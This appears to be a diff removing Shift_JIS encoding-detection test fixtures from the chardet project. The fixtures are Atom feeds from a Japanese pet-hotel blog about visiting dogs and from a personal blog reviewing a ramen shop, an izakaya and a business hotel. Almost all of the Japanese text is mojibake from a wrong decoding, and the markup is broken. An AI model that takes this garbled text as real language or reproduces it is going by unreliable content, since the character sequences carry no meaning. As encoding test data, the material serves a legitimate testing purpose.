    -ˆִO‘½‚¢‚ֵ‚·‚זB
    -‚ג‚ֽ‚ט“ת–{‚ּ‘ד•\¢‚ֵ‚·‚©‚ח‚ֻB
    -ֵ‹ִ¢‚ֶ“₪ֵ‚ּ‹ז•‚ׂ ‚‚ט‚ֲ‚©‚ָ‚­‚ָ‚ֱ‚ִ‚«‚‚µ‚½B
    -ִ¢‚ְֹ‚ח‚¸A‘‘־“I‚ֹ¬‚װ‚ט‚ֹ‚ָ‚ֱ‚ִ‚«‚ִ‚¢‚י‚ז‚₪‚ָ‹C‚ׂ·‚יB
    -ƒƒgƒƒo[niƒ‰ƒuAƒS[ƒ‹ƒfƒ“j‚דֱ‚ֹ¬‚³‚­
    -‚ָ‚ֱ‚ִ‚¢‚י‚ז‚₪‚ָ‹C‚ׂµ‚‚·‚ֻB
    -‚₪‚¿‚ּƒfƒ…[ƒN‚א­‚µ¬‚װ‚ט‚ֵ‚·B
    -¬‚³‚¢ƒ‰ƒu‚׈ך•”‚ּװ‚ֵ—¬s‚ֱ‚ִ‚¢‚י‚ּ‚נ
    -•·‚¢‚½‚±‚ֶ‚ׂ ‚ט‚‚·B
    -ƒ‰ƒu‚ֽ‚©‚ם‚¢‚¢‚ּ‚ֵ‚·‚×A‘ו‚«‚­‚ָ‚י‚ּ‚×™‚ָ‚ּ‚ֵA
    -¬‚³‚¢‚ּ‚נ|‚¯‡‚ם‚¹‚ִA¬‚³‚­‚µ‚ִ‚¢‚י‚ז‚₪‚ֵ‚·B
    -ם‚ּ•‘¶‚ּֿ“_‚©‚חl‚¦‚י‚ֶA‚¢‚©‚ָׂ‚א‚ּ‚ֵ‚µ‚ו‚₪‚©‚ֻH
    -lװ‚ּƒGƒS‚¾‚¯‚ֵFX‚ָ‚א‚ּ‚נל‚טo‚·•—’ֹׂ‚ָ‚ט‚ֲ‚ֲ‚ ‚ט‚‚·B
    -¢‚¾‚¯‚ֵ‚ֽ‚ָ‚­A‘S‚ִ‚ּ“®•¨AA•¨‚ֹ“–‚ִ‚ֽ‚‚י‚±‚ֶ‚ֵ‚·B
    -l‚¦‚י‚¾‚¯‚ֵ­‚µ‹°‚כ‚µ‚¢‹C‚ׂµ‚‚·B
    -

    ]]> - -
    -
    - -ƒS[ƒ‹ƒfƒ“ƒƒgƒ[ƒo[‚×”‘‚‚ט‚ֹ—ˆ‚‚µ‚½ - -2005-07-26T13:25:49Z -2005-07-26T13:20:56Z -tag:www.dogsinn.jp,2005:/owner//2.184 -2005-07-26T13:20:56Z -ƒS[ƒ‹ƒfƒ“‚×”‘‚‚ט‚ֹ—ˆ‚‚µ‚½B ƒfƒ…[ƒN‚ֽ‚ַ‚₪‚אƒƒgƒ[ƒo[n‚בוD‚«‚‚½‚¢‚ֵ‚·... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -ƒS[ƒ‹ƒfƒ“‚×”‘‚‚ט‚ֹ—ˆ‚‚µ‚½B
    -ƒfƒ…[ƒN‚ֽ‚ַ‚₪‚אƒƒgƒ[ƒo[n‚בוD‚«‚‚½‚¢‚ֵ‚·‚ֻB
    -—ˆ‚½‚ֶ‚«‚ּ”½‰‚ׂ·‚²‚¢‚ֵ‚·B
    -•’i‚ֽ‚¨•”‰®‚ֵQ‚ִ‚¢‚י‚ּ‚ֹAƒƒgƒƒo[‚×—ˆ‚½‚ֶ‚«‚¾‚¯‚ֽ
    -•K‚¸•”‰®‚ּ‘O‚‚ֵ—ˆ‚ִA‚»‚ם‚»‚ם‚µ‚ִ‚¢‚יB
    -©‚¦‚ָ‚­‚ִ‚א‹ז•‚ֲׂ‚­‚‚½‚¢‚ֵ‚·B
    -ƒƒgƒƒo[“ֶ“ֱ‚ּ“ץ‚¢‚ׂ ‚י‚ּ‚ֵ‚µ‚ו‚₪‚©‚ֻ
    -

    ]]> - -
    -
    - -ƒ‰ƒuƒ‰ƒh[ƒ‹‚×”‘‚‚ט‚ֹ‚«‚‚µ‚½B - -2005-07-26T01:17:54Z -2005-07-26T01:05:59Z -tag:www.dogsinn.jp,2005:/owner//2.183 -2005-07-26T01:05:59Z -ƒCƒGƒ[‚ּƒ‰ƒuƒ‰ƒh[ƒ‹‚ׂ¨”‘‚ט‚ֹ—ˆ‚‚µ‚½B ‚©‚ם‚¢‚¢•‚נ’…‚ִ‚¢‚‚µ‚½B ƒfƒ…[ƒN... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -ƒCƒGƒ[‚ּƒ‰ƒuƒ‰ƒh[ƒ‹‚ׂ¨”‘‚ט‚ֹ—ˆ‚‚µ‚½B
    -‚©‚ם‚¢‚¢•‚נ’…‚ִ‚¢‚‚µ‚½B
    -ƒfƒ…[ƒN‚ֹ‚א”²‚¯–ׁ‚ׂ׀‚ַ‚­•K—v‚ָ‚ּ‚ֵ‚·‚×A
    -‹‚ּƒyƒbƒgƒVƒ‡ƒbƒv‚ֹ‚ֽ‘ו^¢—p‚ֽ”„‚ֱ‚ִ‚¢‚ָ‚¢‚ּ‚ֵA
    -‚ָ‚©‚ָ‚©”ƒ‚₪‚±‚ֶ‚ֵׂ‚«‚‚¹‚סB
    -’”ּ‚ֶ‚¢‚₪ט‚א‚ ‚י‚ּ‚ֵ‚·‚×A
    -ּ‚ּlװ‚ָ‚ּ‚©Aְ•¨‚נ©‚ָ‚¢‚ֶ”ƒ‚¦‚ָ‚¢B
    -‹x‚ֹ‚א‚ֱ‚ֶ¢ײW‚ּƒVƒ‡ƒbƒv‚ֵׂ‚«‚י‚ֶ‚₪‚ך‚µ‚¢‚ּ‚¾‚×A
    -‚ָ‚ֹ‚¹“cֹ‚ָ‚א‚ס‚ֵ‚·‚©‚חBBB

    ]]> - -
    -
    - -‚‚½‚‚½ƒpƒsƒˆƒ“ - -2005-07-24T13:58:47Z -2005-07-24T13:53:04Z -tag:www.dogsinn.jp,2005:/owner//2.182 -2005-07-24T13:53:04Z -¡“ת‚אƒpƒsƒˆƒ“‚×—ˆ‚‚µ‚½B –­‚ֹ‘±‚­B ’±‚ח‚µ‚­ƒhƒbƒOƒXƒCƒ“‚ֶ‚¢‚₪ֳ‚¢–¨H‚נ ‚·... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -¡“ת‚אƒpƒsƒˆƒ“‚×—ˆ‚‚µ‚½B
    -–­‚ֹ‘±‚­B
    -’±‚ח‚µ‚­ƒhƒbƒOƒXƒCƒ“‚ֶ‚¢‚₪ֳ‚¢–¨H‚נ
    -‚·‚¢‚ֹ—ˆ‚ִ‚י‚ּ‚©‚ָH
    -‚»‚ך‚¾‚¯ƒhƒbƒOƒXƒCƒ“‚ֽ¢‚ֹ‚ֶ‚ֱ‚ִ—ַ‚¢‚¨h‚ֶ
    -‚¢‚₪‚±‚ֶ‚ֹ‚µ‚ִ‚¨‚±‚₪B
    -

    ]]> - -
    -
    - -ƒR[ƒM[@—¬s‚ֱ‚ִ‚‚·‚ֻB - -2005-07-22T17:27:42Z -2005-07-22T09:19:56Z -tag:www.dogsinn.jp,2005:/owner//2.181 -2005-07-22T09:19:56Z -ƒR[ƒM[‚ׂ«‚‚µ‚½B ֵ‹‚·‚²‚­‘½‚¢‚ז‚₪‚ָ‹C‚ׂµ‚‚·B —¬s‚ֱ‚ִ‚¢‚י‚ּ‚ֵ‚µ‚ו‚₪‚ֻ... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -ƒR[ƒM[‚ׂ«‚‚µ‚½B
    -ֵ‹‚·‚²‚­‘½‚¢‚ז‚₪‚ָ‹C‚ׂµ‚‚·B
    -—¬s‚ֱ‚ִ‚¢‚י‚ּ‚ֵ‚µ‚ו‚₪‚ֻB
    -ˆָ‘O‰½ˆ‚©‚ּƒAƒ“ƒP[ƒg‚ֵA
    -l‹CƒxƒXƒg3‚ֹ“‚ֱ‚ִ‚¢‚‚µ‚½B
    -ƒR[ƒM[‚ֽˆך”‚ֹ¶‚‚ך‚½‚ֶ‚«‚ֹ
    -K”צ‚נ״‚ֱ‚ִ‚µ‚‚₪‚»‚₪‚ֵ‚·B
    -‚©‚ָ‚ט‚©‚ם‚¢‚»‚₪‚ָ‹C‚א‚µ‚‚·A
    -‚»‚ּ‚¹‚¢‚©A‚½‚‚ֹK”צ‚ּ’·‚¢
    -ƒR[ƒM[‚א—ˆ“X‚µ‚‚·B
    -ƒR[ƒM[‚ֽ©‚ִ‚¢‚י‚ֶˆ₪‚­‚י‚µ‚­‚ִA—ַ‚¢‚ֵ‚·‚ז‚ֻ`

    ]]> - -
    -
    - -ƒpƒsƒˆƒ“‚Q•C‚וX‚ֵ—ˆ‚‚µ‚½ - -2005-07-21T12:51:41Z -2005-07-21T12:46:06Z -tag:www.dogsinn.jp,2005:/owner//2.180 -2005-07-21T12:46:06Z -נ“ת@ƒpƒsƒˆƒ“‚ֽ’¿‚µ‚¢‚ֶ‘‚«‚‚µ‚½‚×A ‚ָ‚ס‚ֶ¡“ת‚ֽ‚Q•C‚א‚»‚כ‚¢‚‚µ‚½B –”’‚¢... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -נ“ת@ƒpƒsƒˆƒ“‚ֽ’¿‚µ‚¢‚ֶ‘‚«‚‚µ‚½‚×A
    -‚ָ‚ס‚ֶ¡“ת‚ֽ‚Q•C‚א‚»‚כ‚¢‚‚µ‚½B
    -–”’‚¢‚א‚ּ‚ֵ‚·‚ֻB
    -”N‚ֹ”‚¦‚י‚‚ַ‚µ‚©©‚ָ‚¢‚ּ‚ֹA
    -¡“ת‚ֽ‚Q•C‚אB
    -–¾“ת‚ֽ‚R•C‚ֹ‚ָ‚ֱ‚ִ‚¢‚½‚ט‚µ‚ִB

    ]]> - -
    -
    - -ƒpƒsƒˆƒ“‚×—ˆ‚‚µ‚½B - -2005-07-20T13:59:57Z -2005-07-20T13:53:51Z -tag:www.dogsinn.jp,2005:/owner//2.179 -2005-07-20T13:53:51Z -ƒpƒsƒˆƒ“‚×”‘‚‚ט‚ֹ—ˆ‚‚µ‚½B ֵ‹‚ ‚‚ט©‚‚¹‚ס‚ֻB ‰f‰ז‚ּƒOƒƒ€ƒƒ“‚ּƒ‚ƒfƒ‹‚¾... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -ƒpƒsƒˆƒ“‚×”‘‚‚ט‚ֹ—ˆ‚‚µ‚½B
    -ֵ‹‚ ‚‚ט©‚‚¹‚ס‚ֻB
    -‰f‰ז‚ּƒOƒƒ€ƒƒ“‚ּƒ‚ƒfƒ‹‚¾‚ֱ‚½‚©‚ָH
    -‚»‚ס‚ָ´‚¶‚ּˆ₪›g‚ּ‚ ‚יח‚ֵ‚·B
    -‰f‰ז‚‚½‚¢‚ֹ•|‚­‚ֽ‚ ‚ט‚‚¹‚סB
    -–¼‘O‚ּ’‚טAח‚ֶ¨‚×’±‚‚½‚¢‚ֵ‚·B
    -‚·‚²‚­‚©‚ם‚¢‚¢‚ֵ‚·B

    ]]> - -
    -
    - -R“o‚ט‚נ‚·‚יƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX - -2005-07-19T14:20:31Z -2005-07-19T14:12:22Z -tag:www.dogsinn.jp,2005:/owner//2.178 -2005-07-19T14:12:22Z -¡“ת‚¨”‘‚ט‚ּƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ֽ lװ‚ֵ‚א‰½װ‚א‚©‚©‚יR‚נ 1־‚ֹ‚א‚ָ‚ח‚ָ‚¢ƒ~... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -¡“ת‚¨”‘‚ט‚ּƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ֽ
    -lװ‚ֵ‚א‰½װ‚א‚©‚©‚יR‚נ
    -1־‚ֹ‚א‚ָ‚ח‚ָ‚¢ƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚×
    -“o‚ט‚‚·B‚·‚²‚¢‚ֵ‚·‚ז‚ֻB
    -‘O“ת‚ּ‚¨‹q—l‚ּƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ֽ
    -u15•׈ָדU•א‚³‚¹‚ָ‚¢‚ֵ‚­‚¾‚³‚¢v‚ֶ
    -¾‚ם‚ך‚½‚»‚₪‚ֵ‚·B
    -“¯‚¶¢ם‚ֵ‚א‚¾‚¢‚װˆב‚₪‚א‚ּ‚ֵ‚·‚ֻB
    -’P‚ֹˆח‚ִ•‚ּ–ג‘ט‚ָ‚ּ‚©‚ָH

    ]]> - -
    -
    - -ƒ`ƒxƒ^ƒ“ƒeƒƒA‚×—ˆ‚‚µ‚½B - -2005-07-18T14:43:19Z -2005-07-18T14:37:48Z -tag:www.dogsinn.jp,2005:/owner//2.177 -2005-07-18T14:37:48Z -ƒ`ƒxƒ^ƒ“ƒeƒƒA‚×—ˆ‚‚µ‚½B “ת–{‚ֹ80“ׂא‚¢‚ָ‚¢‚»‚₪‚ֵA‚·‚²‚­’¿‚µ‚¢¢ם‚ֵ‚·B ... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -ƒ`ƒxƒ^ƒ“ƒeƒƒA‚×—ˆ‚‚µ‚½B
    -“ת–{‚ֹ80“ׂא‚¢‚ָ‚¢‚»‚₪‚ֵA‚·‚²‚­’¿‚µ‚¢¢ם‚ֵ‚·B
    -©‚½´‚¶‚ֽ‚s‚u‚ּf‚‚¿‚½‚f‚ֹ‚ֵ‚ִ‚­‚יƒ|ƒ`NH‚נ
    -¬‚³‚­‚µ‚½‚ז‚₪‚ָ´‚¶‚ֵ‚·B
    -–ׁF‚ֽ”’‚ֶ•‚ֵ–{“–‚ֹƒ|ƒ`N‚ֹ‚»‚ֱ‚­‚ט‚ֵ‚µ‚½B
    -FX‚ָ–ׁF‚ׂ ‚י‚»‚₪‚ֵA^‚ֱ”’A^‚ֱ•A‚‚¾‚חA‹אF‚ֶ
    -‚ ‚י‚»‚₪‚ֵ‚·B

    ]]> - -
    -
    - -ƒmƒRƒMƒƒNƒƒKƒ^‚‚½•‚‚¦‚‚µ‚½B - -2005-07-18T01:18:25Z -2005-07-18T01:14:52Z -tag:www.dogsinn.jp,2005:/owner//2.176 -2005-07-18T01:14:52Z -¡”N‚ֽƒNƒƒKƒ^‚ׂז‚­ז‚ך‚יB “ֱ‚ֹƒmƒRƒMƒƒNƒƒKƒ^B ƒJƒuƒgƒ€ƒV‚ֽ‚א‚¿‚כ‚ס‚ז‚­ז... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -¡”N‚ֽƒNƒƒKƒ^‚ׂז‚­ז‚ך‚יB
    -“ֱ‚ֹƒmƒRƒMƒƒNƒƒKƒ^B
    -ƒJƒuƒgƒ€ƒV‚ֽ‚א‚¿‚כ‚ס‚ז‚­ז‚ך‚י‚ּ‚ֵ‚·‚×A
    -ƒNƒƒKƒ^‚ּ‘ו•¨‚ֽ‚ָ‚©‚ָ‚©‚ָ‚ּ‚ֹA
    -¡”N‚ֽV•·ף‚¯‚ֹ‚א‹‚½‚ט‚ֶA
    -ּ‚ט•ת‘טB“Vף‚׉e‹¿‚µ‚ִ‚¢‚י‚ּ‚©‚ָH
    -

    ]]> - -
    -
    - -‚‚י‚ֵ‹‚¾B - -2005-07-14T14:15:05Z -2005-07-14T14:10:23Z -tag:www.dogsinn.jp,2005:/owner//2.175 -2005-07-14T14:10:23Z -‰a‚נ•ֿ‚¦‚ִ‚©‚חA‚‚י‚ֵ‹‚ּ‚ז‚₪‚ֹ ‘‚נH‚׳‚יBט“–‚½‚ט‚µ‚¾‚¢B ƒfƒ…[ƒN‚ז‚ָ‚÷‚»... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -‚½‚‚ֹ‚ֽ“ַ‘ - -‰a‚נ•ֿ‚¦‚ִ‚©‚חA‚‚י‚ֵ‹‚ּ‚ז‚₪‚ֹ
    -‘‚נH‚׳‚יBט“–‚½‚ט‚µ‚¾‚¢B
    -ƒfƒ…[ƒN‚ז‚ָ‚÷‚»‚ס‚ָ‚ֹ‘‚נH‚׳‚י‚ּH
    -u‚»‚±‚ֹ‘‚ׂ ‚י‚©‚חv
    -‚µ‚ב‚׳‚ך‚½‚חA‚»‚ס‚ָ‚±‚ֶ‚נ¾‚¢‚»‚₪‚ָ‚®‚ח‚¢A
    -‘‚נH‚׳‚ִ‚¢‚יB
    -ֱ‰»‚׈«‚¢‚ּ‚©‚ָEEE
    -ֵ‹‘¾‚ט‹C–¡‚¾‚µB
    -³‹C‚ֵ‚¢‚ִ‚­‚ך‚זB

    ]]> - -
    -
    - -ƒƒTƒCƒNƒ‹—¿‚ֽ‚‚¢H - -2005-07-12T13:35:12Z -2005-07-12T13:24:02Z -tag:www.dogsinn.jp,2005:/owner//2.174 -2005-07-12T13:24:02Z -¡“תV‚µ‚¢—ג‘ ֹ‚ׂ«‚‚µ‚½B “d¹‚נ״‚ֱ‚ִ‚¢‚ִA‚¢‚´g‚¨‚₪‚ֶv‚ֱ‚ִ“d¹‚נ“‚ך‚י‚ֶ... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -¡“תV‚µ‚¢—ג‘ ֹ‚ׂ«‚‚µ‚½B
    -“d¹‚נ״‚ֱ‚ִ‚¢‚ִA‚¢‚´g‚¨‚₪‚ֶv‚ֱ‚ִ“d¹‚נ“‚ך‚י‚ֶ
    -“®‚©‚ָ‚¢I“d‹C‚ֽ“_‚­‚ּ‚ֹB
    -C—‚נִ‚ס‚¾‚חAC—‚·‚י‚ז‚ט‚אV‚µ‚¢‚א‚ּ‚נ”ƒ‚₪‚‚₪‚×
    -ˆְ‚¢‚ֵ‚·‚ז‚ֶ¾‚ם‚ך‚½B‚ָ‚÷AC—‚ֽ‚‚­‚ֲ‚­‚ּ‚©
    -—‰נ‚ֵ‚«‚ָ‚¢B
    -d•‚ָ‚¢‚ּ‚ֵAV‚µ‚¢‚א‚ּ‚נw“B
    -‚ֲ‚¢‚ֵ‚ֹ—v‚ח‚ָ‚­‚ָ‚ֱ‚½ƒeƒƒr‚אƒƒTƒCƒNƒ‹‚ֹo‚·‚ֶ
    -‚·‚²‚¢‹אz‚ֹI4–‰~‹‚­ז‚ח‚ך‚‚µ‚½B
    -—ג‘ ֹ1‘הAƒeƒƒr8‘הB
    -ƒeƒƒr‚ֽO‘‚ּƒ[ƒJ[‚ֽ•—¿‹א‚ֹ‚ָ‚י‚ֶ¾‚ם‚ךA
    -‚¢‚¢’l’iז‚ח‚ך‚½B’u‚¢‚ִ‚¨‚­•‚×—ַ‚©‚ֱ‚½‚ּ‚©‚אBBB
    -‚»‚ך‚ֹ‚µ‚ִ‚אƒƒTƒCƒNƒ‹—¿‚ֽ”n­‚ֹ‚ָ‚ט‚‚¹‚ס‚ֻB
    -‚א‚₪‚·‚®’nד”g‚×–³‚­‚ָ‚­‚ָ‚טAƒeƒƒr‚א‘S•”
    -”ƒ‚¢·‚¦‚י‚ז‚₪‚ֹ‚ָ‚י‚ֶA‚‚½ז‚ח‚ך‚י‚ּ‚ֵ‚·‚ֻB
    -‚²‚‚נo‚·‚ּ‚ֹ‚¨‹א‚ׂ©‚©‚י‘ד‚×—ˆ‚½‚ּ‚ֵ‚·‚ֻB

    ]]> - -
    -
    - -‚³‚¨‚¾‚¯‰®‚ֽ‚ָ‚÷’׳‚ך‚ָ‚¢‚ּ‚©? g‹‚ָ‹^–ג‚©‚ח‚ֽ‚¶‚‚י‰ןvw - -2005-07-08T14:34:36Z -2005-07-08T14:23:06Z -tag:www.dogsinn.jp,2005:/owner//2.172 -2005-07-08T14:23:06Z -@@ ץ•¶׀V‘ R“c ^ֶ (’˜) ... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -‚½‚‚ֹ‚ֽ“ַ‘ - -@@

    -

    ץ•¶׀V‘
    - R“c ^ֶ (’˜)
    - ‰¿iF 735 iֵj

    -

    ‚ז‚­l‚¦‚י‚ֶAˆ׃O‚ֶ‚¨‹q‚³‚ס‚א‹‚ָ‚¢‚ּ‚ֹA₪”„‚ב±‚¢‚ִ‚¢‚י‚ָH‚ֶ

    -

    v‚₪‚¨“X‚ׂ½‚­‚³‚ס‚ ‚יB‚³‚¨‚¾‚¯‰®‚א‚»‚ּ‚₪‚¿‚ּˆך‚ֲ‚ֵA‹»–¡‚ׂ ‚ט

    -

    w“‚µ‚‚µ‚½B–{‚ּא‚ֹ‚ז‚י‚ֶ‚³‚¨‚¾‚¯‰®‚ֽ‹א•¨‰®‚³‚ס‚ֵA”z’B‚ֹs‚ֱ‚½

    -

    ‚ֲ‚¢‚ֵ‚ֹװ”ּ”„‚µ‚ִ‚¢‚יA‚א‚µ‚­‚ֽ‚‹‰‚ָ‚³‚¨‚נ”ּ”„‚µ‚ִ‚¢‚י‚ֶ‚ּ–‚ֵ‚µ‚½‚×A

    -

    ‚ַ‚₪‚א”[“¾‚ֵ‚«‚¸A©•ּׂl‚¦‚ֽAƒZƒLƒ…ƒƒeƒB[‰ן׀‚וֿ‘•‚µ‚ִA

    -

    ˆְ‘Sm•‚ֹ“w‚‚ִ‚¢‚¢‚יB‚א‚µ‚­‚ֽ‹ף‚«‘ƒ‘_‚¢‚ּ“D–_‚ֵ‚ֽ‚ָ‚¢‚©‚ֶv‚ֱ‚ִ‚¢‚‚·B

    -

    ^‘‚ֽ‚ם‚©‚ט‚‚¹‚ס‚×A„‚ּ‰ֶ‚ּ‚ט‚ֹ‚ֽ‚¢‚‚¾‚ֹ‚³‚¨‚¾‚¯‰®‚׉ס‚ֱ‚ִ‚¢‚‚·B

    -

    ƒZƒLƒ…ƒƒeƒB[‚·‚י‚‚ַ‚ּ“s‰ן‚ֵ‚ֽ‚ָ‚¢‚µA“D–_‚×o‚½‚ֶ‚¢‚₪˜b‚א•·‚¢‚½‚±‚ֶ‚×–³‚¢B

    -

    ‚‚µ‚ִ‚ג‹א•¨‰®‚³‚ס‚א–³‚¢B‚ַ‚₪‚ג‚ֱ‚ִ¶v‚נ—§‚ִ‚ִ‚י‚ּ‚ֵ‚µ‚ו‚₪‚ֻB•sv‹c‚ֵ‚·B

    -

    ‚¨‚·‚·‚“xF

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/grebeweb.net.xml b/chardet/tests/SHIFT_JIS/grebeweb.net.xml deleted file mode 100644 index a469d7f..0000000 --- a/chardet/tests/SHIFT_JIS/grebeweb.net.xml +++ /dev/null @@ -1,444 +0,0 @@ - - - -‹ף‚א”ע‚װ‚µ…‚ֹ‚אצ‚י - -2006-01-03T09:58:09Z - -tag:www.grebeweb.net,2006:/mt/1 -Movable Type -Copyright (c) 2006, Grebeweb - -‚ז‚ֱ‚ִ‚±‚ג“ל‘’ֳ“X - -2006-01-03T09:58:09Z -2006-01-03T09:55:30Z -tag:www.grebeweb.net,2006:/mt/1.471 -2006-01-03T09:55:30Z -ƒ‰[ƒƒ“‰®‚³‚ס ³ִ‚ֵֽ‚B —ַ‚¢“_ ‚·‚«ִ‚«•—‚ּ–¡•t‚¯‚ּֿ‹q‚×”–¡‚µ‚©‚ֱ‚½... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -ƒ‰[ƒƒ“‰®‚³‚ס
    -³ִ‚ֵֽ‚B

    - -

    —ַ‚¢“_
    -‚·‚«ִ‚«•—‚ּ–¡•t‚¯‚ּֿ‹q‚×”–¡‚µ‚©‚ֱ‚½B
    -¬•¨‚נH•v‚µ‚ִל‚ח‚ך‚½“X“א‚ּ•µˆֽ‹C‚×—ַ‚¢B

    - -

    ˆ«‚¢“_
    -–ֻAƒX[ƒvA“Y‚¦•¨‚ֲּX‚ּ–¡‚ֽ—ַ‚¢‚ּ‚¾‚בS‘ּ‚ּƒoƒ‰ƒ“ƒX‚׈«‚¢B
    -ƒX[ƒv‚׃pƒ[•s‘«‚©‚ָB
    -–ֻ‚ּ‚©‚ס…‚ּ–¡‚׋C‚ֹ‚ָ‚יB
    -ƒƒjƒ…[‚ּמ•ס—‚ב½‚·‚¬‚יB

    ]]> - -
    -
    - -H‚׳ˆEˆש‚ˆ@‘ו’‰—JR־R‰w“k•א‚R•× - -2006-01-01T14:14:46Z -2006-01-01T14:11:10Z -tag:www.grebeweb.net,2006:/mt/1.470 -2006-01-01T14:11:10Z -l“–‚½‚ט‚ּ—ַ‚¢‚²•v•w‚×o‰c‚µ‚ִ‚¢‚י‹נ‰®B H‚׳•¨‚ֽ‚ַ‚ך‚א‚‚ַ‚‚ַ‚ֹ”–¡‚µ‚¢‚×A... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -l“–‚½‚ט‚ּ—ַ‚¢‚²•v•w‚×o‰c‚µ‚ִ‚¢‚י‹נ‰®B

    - -

    H‚׳•¨‚ֽ‚ַ‚ך‚א‚‚ַ‚‚ַ‚ֹ”–¡‚µ‚¢‚×A•׃‰¿i‚ֶ”ה‚׳‚י‚ֶ‘½­‚‚¢‚©B
    -hg—‚ֽ‚P•i‚U‚W‚O‰~‚ֶ’צX‚ּ’l’i‚ֵ‚ֽ‚¸‚ך‚ָׂ‚©‚ֱ‚½B
    -“ת–{נu‹v•“cv780‰~‚×—¿—‚ֹ‚ז‚­‚ ‚ֱ‚½B

    - -

    “X“א‚ֹ“X–¼‚ּ•\¦‚ׂ ‚י‚ֶ—ַ‚¢‚©‚אB

    ]]> - -
    -
    - -ƒX[ƒp[ƒzƒeƒ‹City’r‘–k - -2006-01-01T14:24:25Z -2006-01-01T13:59:05Z -tag:www.grebeweb.net,2006:/mt/1.469 -2006-01-01T13:59:05Z -ƒX[ƒp[ƒzƒeƒ‹City’r‘–k ‚¨‚·‚·‚‚ּƒrƒWƒlƒXƒzƒeƒ‹‚ֵ‚·B uƒX[ƒp[ƒzƒeƒ‹... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -ƒX[ƒp[ƒzƒeƒ‹City’r‘–k

    - -

    ‚¨‚·‚·‚‚ּƒrƒWƒlƒXƒzƒeƒ‹‚ֵ‚·B
    -uƒX[ƒp[ƒzƒeƒ‹v‚ֶ‚¢‚₪aV‚ָ–¼‘O‚ֵ‚·‚×AƒT[ƒrƒX‚ֽ”סם‚ֹƒI[ƒ\ƒhƒbƒNƒX‚ֵ‚·B

    - -

    —ַ‚¢“_
    -‚‚ַ‚‚ַˆְ‚¢B
    -ƒrƒWƒlƒXƒzƒeƒ‹‚ּ„‚ֹ•”‰®‚×–¾‚י‚¢
    -‡–°‚נ‚ֶ‚י‚±‚ֶ‚ֹˆ׃¯‚ו¥‚ם‚ך‚ִ‚¢‚יiֳ‚©A–‚בI‚׳‚יA‚ָ‚ַj
    -•׉
    -‹ָ‚ׂט‚ָ‚ט‚ֹ‚א’©‚²”ׁ‚ׂ ‚י

    - -

    ˆ«‚¢“_
    -‚₪[‚סAAA“ֱ‚ֹ‚ָ‚¢‚ָ‚ B

    - -

    ‚ A–Y‚ך‚ִ‚½B
    -LAN‚ׂ ‚יB
    -ƒlƒbƒg‚×g‚¦‚יB‚±‚ך‘ו–B

    ]]> - -
    -
    - -‚ ‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪ - -2006-01-01T12:26:46Z -2006-01-01T12:22:46Z -tag:www.grebeweb.net,2006:/mt/1.468 -2006-01-01T12:22:46Z -‚ ‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚·B ¡”N‚ֽt‚ֹˆר‚ֱ‰z‚µ‚נ‚µ‚‚·B ‚¢‚כ‚¢‚כ‚ֶ¶ˆ‚ֹ... - -Grebeweb - -mt@grebeweb.net - -G– - -‚ ‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚·B

    - -

    ¡”N‚ֽt‚ֹˆר‚ֱ‰z‚µ‚נ‚µ‚‚·B
    -‚¢‚כ‚¢‚כ‚ֶ¶ˆ‚ֹ•ֿ‰»‚ׂ ‚ט‚»‚₪‚ֵ‚·B
    -ˆר‚ֱ‰z‚µ‚‚ֵ‚ֹd–‚ּ‚µ‚¾‚‚נ‚µ‚ָ‚­‚ִ‚ֽ‚ָ‚ט‚‚¹‚סB
    -‘ו—‚ּ•׳‹­‚א•K—v‚ֵ‚·B
    -ƒn[ƒh‚ָˆך”Nװ‚ֹ‚ָ‚ט‚»‚₪‚ֵ‚·B

    ]]> - -
    -
